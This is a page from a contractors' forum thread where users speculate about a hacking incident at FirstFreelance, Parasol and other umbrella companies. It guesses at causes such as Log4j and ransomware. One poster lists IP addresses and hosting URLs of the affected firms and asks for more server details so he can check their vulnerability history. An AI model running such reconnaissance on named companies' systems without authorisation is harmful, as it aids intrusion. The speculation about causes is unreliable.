1. Contracting
    1. General
      1. Brexit
    2. Business / Contracts
      1. Coronavirus Assistance
    3. Accounting / Legal
      1. Umbrella Companies
      2. HMRC Scheme Enquiries
      3. The Future of Contracting
      4. IR35 Reform
    4. Technical
    5. Welcome / FAQs
  2. Social
    1. Light Relief
    2. Social / Events
  • Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

FirstFreelance Hacked Too

Collapse
X
11 to 20 of 29 Previous 1 2 3 template Next
Collapse
Reply to Thread
  •  
  • Filter
  • Time
  • Show
Clear All
new posts
11 to 20 of 29 Previous 1 2 3 template Next
    #11
    Originally posted by agentzero View Post

    There are some options here, assuming this is true for a minute: they ran this server in the same cloud VPC with all other services, perhaps even the database. It's then possible databases were unencrypted and they acquired other passwords to crucial services and so extracted those before installing ransomware.

    If this is an on site installation and not cloud, then it's possible the hackers have taken everything and encrypted much other stuff, including backups. These companies don't hit me as being knowledgeable about IT or architecture. Due to the large number of mess ups they have made, I hope they are one way encrypted with ransomware and can't return to service.

    I have sympathy for the normal human workers affected and contractors affected by this. I have no sympathy for the management, as they have been awful for a few years now and there has been fair warning on this forum, including my own experience that seen a friend I helped recover from a lot of money lost due to managers in one of these firms lying about submitting accounts and companies house striking off the company, with all bank accounts froze. He had just lost his wife to covid. Court date still awaits.
    I left IT before Azure and cloud became cool beans. I was a Microsoft guy before that. I am guessing everything was on the same box and probably onsite too. I don't know to what extent they are using AWS/Azure or other cloud services. Another post here suggested that the VOIP phone system was on the same VLAN as everything else!

    The irony is that based on who their punters are a few words in the right ears and a few payslips bumped up by a few hours could have prevented this from ever happening!
    Former IPSE member
    My Website

    Comment

      #12
      Originally posted by eek View Post
      Actually it's just part of the Optionis group so part of Paraosol/ NW so it's the same attack

      Acquisition of First Freelance by Optionis Group Limited - BDO
      Good research Eek. Given that Brookson are affected too, are we really sure Brookson are still independent of Parasol?

      If someone can PM me some details about the server, such as IP address range or specific IP addresses, I can look at history of that target and try to gain some more information. I can't see IP address ranges owned by Parasol yet, but all things are possible given enough time.

      Comment

        #13
        Originally posted by agentzero View Post

        Good research Eek. Given that Brookson are affected too, are we really sure Brookson are still independent of Parasol?

        If someone can PM me some details about the server, such as IP address range or specific IP addresses, I can look at history of that target and try to gain some more information. I can't see IP address ranges owned by Parasol yet, but all things are possible given enough time.
        30 seconds of research

        Ultimate owner of Brookson is Riverside Partners

        Ultimate owner of Optionis are Sovereign Capital Partners Llp

        so completely different.
        Last edited by eek; 26 January 2022, 15:30.
        merely at clientco for the entertainment

        Comment

          #14
          To the mods: I don't want to overstep the boundary here, but I am not doing anything malicious in looking this information up:


          https://viewdns.info/iphistory/?doma...onwilliams.com

          https://viewdns.info/iphistory/?doma...solgroup.co.uk

          https://viewdns.info/iphistory/?doma...ccountancy.com

          There is no auto-redirect from pre 2022 IP addressing from HTTP to HTTPS, as an example:

          http://93.93.226.228

          Still exists as a webpage. The certificate for the HTTPS, without redirect from HTTP unusually, is assigned to: practiceweb.co.uk

          The DNS does redirect from HTTP to HTTPS automatically to lead to: https://www.practiceweb.co.uk/


          There is no blame to be assigned to PracticeWeb, instead this is an example of a central account service or software that is a possible access point for hackers.


          If we check the more recent 15th December changes to CloudFlare:

          https://104.248.163.222/

          Again, the DNS and certificate show this is SJDaccountancy. This leads to: https://wordpress-663177-2175960.cloudwaysapps.com/

          If anybody has used SJD, are they familiar with this cloudwaysapps.com suffix?

          As much as misconfigured CloudFlare is possible, it is far more likely access and elevated privilege credentials were obtained before the move to CloudFlare in December. It is worth noting that parasolgroup.co.uk doesn't register a move to Cloudflare, so I'll move on to focusing on that IP range and look at vulnerability tracking history for this range.
          Last edited by agentzero; 26 January 2022, 15:40.

          Comment

            #15
            agentzero I'm at a complete loss as to what you are saying that,

            A number of forward facing marketing websites (as that is all the core www.xyz.com sites are) are now pointing at a ip address of a firm that does website marketing for Professional service firms (i.e. accountants).

            merely at clientco for the entertainment

            Comment

              #16
              I love all the conjecture (someone alway wants it to be an disgruntled ex-employee), but I suggest Occam's razor should be at play here. ie. a software vulnerability is being used against the various umbrella/finance companies and those that want to benefit from that are working their way through the IP address stack across the public facing internet looking for targets. Our life-lens means it looks like these subset of companies are being targetted, but that's not necessarily the case. I'd not assume the same attacker for each and every target either.

              But, if we're doing conjecture, I'm going with the Log4J vulnerability that was identified at the end of last year.
              Last edited by Paralytic; 26 January 2022, 16:04.

              Comment

                #17
                Originally posted by eek View Post
                agentzero I'm at a complete loss as to what you are saying that,

                A number of forward facing marketing websites (as that is all the core www.xyz.com sites are) are now pointing at a ip address of a firm that does website marketing for Professional service firms (i.e. accountants).
                A complete loss or partial loss?

                One has to look at past IPs referenced to determine the value vs effort in looking at vulnerability tracking websites, rather than waste time. If a common accounting package or software is at one of those IPs, I would look further into that, given the nature of Parasol's business. If it was a tyre company at that IP, I wouldn't bother looking further.

                The more interesting thing is that Parasol/SJD have left their cloudwaysapps server online but redirected the DNS that lead to this elsewhere. To save me time, it's easier if somebody can reference the .aspx/.asp server mentioned, as otherwise it takes at least 24 hours to perform a scan of all IPs and their vulnerability history, and as you mention Eek many of these will be reassigned IP addresses.

                As Paralytics has mentioned, there is a high chance that this is the log4j vulnerability in action. Even if it was patched, other issues emerged. There is still no patch that leads to a 100% fix yet.
                Last edited by agentzero; 26 January 2022, 16:06.

                Comment

                  #18
                  Originally posted by agentzero View Post

                  A complete loss or partial loss?

                  One has to look at past IPs referenced to determine the value vs effort in looking at vulnerability tracking websites, rather than waste time.

                  The more interesting thing is that Parasol/SJD have left their cloudwaysapps server online but redirected the DNS that lead to this elsewhere. To save me time, it's easier if somebody can reference the .aspx/.asp server mentioned, as otherwise it takes at least 24 hours to perform a scan of all IPs and their vulnerability history, and as you mention Eek many of these will be reassigned IP addresses.

                  As Paralytics has mentioned, there is a high chance that this is the log4j vulnerability in action. Even if it was patched, other issues emerged. There is still no patch that leads to a 100% fix yet.
                  But you are looking at the marketing / sales pitch websites not the background portals where the real work is done.

                  You need to identify what the urls for those portals were and track those not the marketing pages on the (probably wordpress based) branded sales and blog website.
                  merely at clientco for the entertainment

                  Comment

                    #19
                    I have only the slightest understanding of the techy stuff here. It would be too good to be true, I suppose, that these awful companies never reopen because all their systems are wrecked?

                    If that were to come to pass, it would be mildly inconvenient for some contractors (who for their own good should have moved their business accounts anyway). But overall it would be very good for the future of the industry.

                    I guess it's just too good to be true though.
                    Public Service Posting by the BBC - Bloggs Bulls**t Corp.
                    Officially CUK certified - Thick as f**k.

                    Comment

                      #20
                      Originally posted by Paralytic View Post
                      I love all the conjecture (someone alway wants it to be an disgruntled ex-employee), but I suggest Occam's razor should be at play here. ie. a software vulnerability is being used against the various umbrella/finance companies and those that want to benefit from that are working their way through the IP address stack across the public facing internet looking for targets. Our life-lens means it looks like these subset of companies are being targetted, but that's not necessarily the case. I'd not assume the same attacker for each and every target either.

                      But, if we're doing conjecture, I'm going with the Log4J vulnerability that was identified at the end of last year.
                      Occam's razor would suggest ransomware though. And they have shut down/disconnected all other systems to prevent destruction of more information whilst they isolate it. **** the punters for now, they just want to avoid a huge Bitcoin bill.
                      See You Next Tuesday

                      Comment

                      Reply to Thread
                      11 to 20 of 29 Previous 1 2 3 template Next

                      Advertisers

                      1. Contracting
                        1. General
                          1. Brexit
                        2. Business / Contracts
                          1. Coronavirus Assistance
                        3. Accounting / Legal
                          1. Umbrella Companies
                          2. HMRC Scheme Enquiries
                          3. The Future of Contracting
                          4. IR35 Reform
                        4. Technical
                        5. Welcome / FAQs
                      2. Social
                        1. Light Relief
                        2. Social / Events
                      Working...
                      X